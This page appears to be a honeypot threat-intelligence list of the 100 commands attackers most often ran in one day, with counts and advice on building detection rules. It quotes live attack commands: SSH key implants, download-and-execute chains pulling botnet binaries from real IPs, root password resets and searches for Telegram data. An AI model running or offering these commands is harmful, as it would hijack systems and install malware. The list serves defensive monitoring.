Updated: December 2025

Top 100 Malicious Commands

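The commands attackers most often execute after gaining system access. Useful for intrusion detection and incident response. Entries are shown as captured, so the list also contains strings that are not commands (password prompts, HTTP header lines, lone shell keywords such as `then` and `fi`), and some long entries appear to be cut off.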

10,929 commands in 24h
1.
$cd ~; chattr -ia .ssh; lockr -ia .ssh
198 IPs555x
2.
$lockr -ia .ssh
198 IPs555x
3.
$cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
195 IPs545x
4.
$cat /proc/cpuinfo | grep name | wc -l
175 IPs470x
5.
$cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
173 IPs463x
6.
$uname -a
180 IPs462x
7.
$df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
177 IPs460x
8.
$ls -lh $(which ls)
174 IPs459x
9.
$free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
174 IPs459x
10.
$which ls
174 IPs459x
11.
$lscpu | grep Model
177 IPs459x
12.
$crontab -l
173 IPs456x
13.
$uname
175 IPs456x
14.
$top
173 IPs455x
15.
$whoami
176 IPs455x
16.
$uname -m
175 IPs454x
17.
$cat /proc/cpuinfo | grep model | grep name | wc -l
173 IPs453x
18.
$w
171 IPs451x
19.
$Enter new UNIX password:
149 IPs297x
20.
$Enter new UNIX password:
149 IPs297x
21.
$rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
111 IPs171x
22.
$cat /proc/uptime 2 > /dev/null | cut -d. -f1
33 IPs138x
23.
$uname -s -v -n -m 2 > /dev/null
47 IPs120x
24.
$export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc || grep -c "^processor" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version
47 IPs120x
25.
$uname -s -v -n -r -m
20 IPs90x
26.
$uname -m 2 > /dev/null
33 IPs69x
27.
$/bin/./uname -s -v -n -r -m
15 IPs68x
28.
$cd /data/local/tmp/; rm *; busybox wget http://94.154.35.154/arm.uhavenobotsxd; curl http://94.154.35.154/arm.uhavenobotsxd -O; chmod +x arm.uhavenobotsxd; ./arm.uhavenobotsxd android; busybox wget http://94.154.35.154/arm5.uhavenobotsxd; curl http://94.154.35.154/arm5.uhavenobotsxd -O; chmod +x arm5.uhavenobotsxd; ./arm5.uhavenobotsxd android; busybox wget http://94.154.35.154/arm6.uhavenobotsxd; curl http://94.154.35.154/arm6.uhavenobotsxd -O; chmod +x arm6.uhavenobotsxd; ./arm6.uhavenobotsxd
1 IPs33x
29.
$cd /data/local/tmp/; busybox wget http://31.97.147.189/w.sh; sh w.sh; curl http://31.97.147.189/c.sh; sh c.sh; wget http://31.97.147.189/wget.sh; sh wget.sh; curl http://31.97.147.189/wget.sh; sh wget.sh; busybox wget http://31.97.147.189/wget.sh; sh wget.sh; busybox curl http://31.97.147.189/wget.sh; sh wget.sh
2 IPs23x
30.
$for d in /data/local/tmp /tmp /dev/shm /var/tmp /data /; do if touch $d/.w 2>/dev/null; then cd $d; rm .w; break; fi; done; rm -f x; arch=$(uname -m); if [ "$arch" = "x86_64" ]; then BIN="shadow.x86_64"; elif [ "$arch" = "i686" ] || [ "$arch" = "i386" ]; then BIN="shadow.x86"; elif [ "$arch" = "mips" ]; then BIN="shadow.mips"; elif [ "$arch" = "mipsel" ]; then BIN="shadow.mpsl"; elif [ "$arch" = "armv7l" ] || [ "$arch" = "armv7" ]; then BIN="shadow.arm7"; elif [ "$arch" = "armv6l" ]; then BIN="s
1 IPs19x
31.
$uname -s -v -n -r-m
3 IPs15x
32.
$cd /data/local/tmp/; busybox wget http://130.12.180.20:36695/w.sh; sh w.sh; curl http://130.12.180.20:36695/c.sh; sh c.sh; wget http://130.12.180.20:36695/wget.sh; sh wget.sh; curl http://130.12.180.20:36695/wget.sh; sh wget.sh; busybox wget http://130.12.180.20:36695/wget.sh; sh wget.sh; busybox curl http://130.12.180.20:36695/wget.sh; sh wget.sh
2 IPs13x
33.
$echo SCANNER_TEST
10 IPs12x
34.
$cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps
1 IPs9x
35.
$curl2
1 IPs9x
36.
$echo "cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps" | sh
1 IPs9x
37.
$system
4 IPs8x
38.
$shell
4 IPs8x
39.
$uname -s -m
7 IPs7x
40.
$q
3 IPs6x
41.
$echo SHELL_TEST
2 IPs5x
42.
$pm path com.ufo.miner
3 IPs5x
43.
$/ip cloud print
2 IPs4x
44.
$while read i
4 IPs4x
45.
$sh
4 IPs4x
46.
$enable
4 IPs4x
47.
$cd /data/local/tmp; su 0 mkdir .wws || mkdir .wws; cd .wws; toybox nc 130.12.180.76 3338 > parm7; toybox nc 130.12.180.76 3336 > parm5; toybox nc 130.12.180.76 3337 > parm6; toybox nc 130.12.180.76 3335 > parm; su 0 chmod 777 parm7 parm5 parm6 parm || chmod 777 parm7 parm5 parm6 parm; su 0 ./parm7 arm7; ./parm5; ./parm6; ./parm; su 0 ./parm7 arm5 || ./parm5 arm5 || ./parm6 arm5 || ./parm arm5;
1 IPs4x
48.
$Accept-Encoding: gzip
2 IPs4x
49.
$dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s
3 IPs3x
50.
$rm .s; exit
3 IPs3x
51.
$cd /data/local/tmp/; busybox wget http://213.202.211.46/w.sh; sh w.sh; curl http://213.202.211.46/c.sh; sh c.sh; wget http://213.202.211.46/wget.sh; sh wget.sh; curl http://213.202.211.46/wget.sh; sh wget.sh; busybox wget http://213.202.211.46/wget.sh; sh wget.sh; busybox curl http://213.202.211.46/wget.sh; sh wget.sh
1 IPs2x
52.
$chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtB
1 IPs2x
53.
$then
1 IPs2x
54.
$cat /proc/cpuinfo
2 IPs2x
55.
$ps | grep '[Mm]iner'
2 IPs2x
56.
$ps -ef | grep '[Mm]iner'
2 IPs2x
57.
$ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
2 IPs2x
58.
$locate D877F783D5D3EF8Cs
2 IPs2x
59.
$Accept: */*
1 IPs2x
60.
$fi
1 IPs2x
61.
$echo "root:5H2Qyrl6Y2mW"|chpasswd|bash
2 IPs2x
62.
$echo "root:6kzsHk8OZHZa"|chpasswd|bash
2 IPs2x
63.
$echo Hi | cat -n
2 IPs2x
64.
$ifconfig
2 IPs2x
65.
$rm /data/local/tmp/ufo.apk
2 IPs2x
66.
$echo "123456\nHhIwZmxckf0G\nHhIwZmxckf0G\n"|passwd
1 IPs1x
67.
$echo "123456\n7oeF57BcCpuc\n7oeF57BcCpuc\n"|passwd
1 IPs1x
68.
$echo "123456\n0sJeGrjeFrAK\n0sJeGrjeFrAK\n"|passwd
1 IPs1x
69.
$echo "123456\n0pw9ovxJbggS\n0pw9ovxJbggS\n"|passwd
1 IPs1x
70.
$Macintosh ; Intel Mac OS X 10_15_7
1 IPs1x
71.
$echo "12345678\nAGIOxFpKmzKc\nAGIOxFpKmzKc\n"|passwd
1 IPs1x
72.
$echo "123456789\nUN9fCms1KADP\nUN9fCms1KADP\n"|passwd
1 IPs1x
73.
$echo "123456789\nTfO86uQzuTYx\nTfO86uQzuTYx\n"|passwd
1 IPs1x
74.
$echo "123456789\nIbBjsBl5n8vy\nIbBjsBl5n8vy\n"|passwd
1 IPs1x
75.
$Macintosh
1 IPs1x
76.
$echo "123456789\n76f8iqg8PUKm\n76f8iqg8PUKm\n"|passwd
1 IPs1x
77.
$echo "123456789\n3fum88QeLtjz\n3fum88QeLtjz\n"|passwd
1 IPs1x
78.
$cat /proc/mounts; /bin/busybox NMYXY
1 IPs1x
79.
$echo "123456789\n1nkQNGjqfAtZ\n1nkQNGjqfAtZ\n"|passwd
1 IPs1x
80.
$echo "123123\nzj9A7hujHD9q\nzj9A7hujHD9q\n"|passwd
1 IPs1x
81.
$cat /proc/mounts; /bin/busybox KUQDM
1 IPs1x
82.
$echo "123123\nhgDaFiby1R0D\nhgDaFiby1R0D\n"|passwd
1 IPs1x
83.
$echo "123123\nVvtZhVMGfs8l\nVvtZhVMGfs8l\n"|passwd
1 IPs1x
84.
$cat /proc/mounts; /bin/busybox KKIVX
1 IPs1x
85.
$echo "123123\nRl0K6b9pzdSi\nRl0K6b9pzdSi\n"|passwd
1 IPs1x
86.
$echo "1\nGj3o5ExzXb28\nGj3o5ExzXb28\n"|passwd
1 IPs1x
87.
$echo "123123\n2LBlWS6oXQBb\n2LBlWS6oXQBb\n"|passwd
1 IPs1x
88.
$cat /proc/mounts; /bin/busybox BHKVR
1 IPs1x
89.
$Intel Mac OS X 10_15_7
1 IPs1x
90.
$/bin/busybox KUQDM
1 IPs1x
91.
$echo "1\nAoTGIpdjChLv\nAoTGIpdjChLv\n"|passwd
1 IPs1x
92.
$echo "1\nA0bOof82ZkPP\nA0bOof82ZkPP\n"|passwd
1 IPs1x
93.
$echo "1\n6dfFsVTMfhXj\n6dfFsVTMfhXj\n"|passwd
1 IPs1x
94.
$echo "1\n2HE2czVPRFdx\n2HE2czVPRFdx\n"|passwd
1 IPs1x
95.
$echo "1\n0KuBIVaoehoB\n0KuBIVaoehoB\n"|passwd
1 IPs1x
96.
$echo "1\nQOdM0eKiXJe7\nQOdM0eKiXJe7\n"|passwd
1 IPs1x
97.
$echo "1\nW0jCDx0eKJpP\nW0jCDx0eKJpP\n"|passwd
1 IPs1x
98.
$echo "1\nf0FjM6lnFlbn\nf0FjM6lnFlbn\n"|passwd
1 IPs1x
99.
$echo "1\nnpPRqp8RrWqz\nnpPRqp8RrWqz\n"|passwd
1 IPs1x
100.
$echo "123\nxIQxRc4LJ4BE\nxIQxRc4LJ4BE\n"|passwd
1 IPs1x

Reconnaissance

uname, whoami, cat /etc/passwd

Download

wget, curl, tftp

Persistence

crontab, chmod, chattr

Lateral Movement

ssh, scp, ping

Detection Use

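These commands can be used to create detection rules in SIEM, IDS/IPS, and monitoring systems. Monitor these patterns in your logs to detect intrusions. Many entries (`uname`, `whoami`, `w`, `top`, `crontab -l`) are also routine administrator activity, so a rule that fires on a single command will be noisy. Rules are more reliable when they match the sequences and contexts that stand out in this list: `chattr -ia` on `.ssh` followed by a rewrite of `authorized_keys` (entries 1–3), download-and-execute chains run from `/data/local/tmp` (for example entries 28 and 29), and passwords piped into `passwd` or `chpasswd` (entries 61–62 and 66 onward). The IP addresses, SSH keys and file names shown are indicators from this 24-hour window only, so re-validate them before using them in block lists.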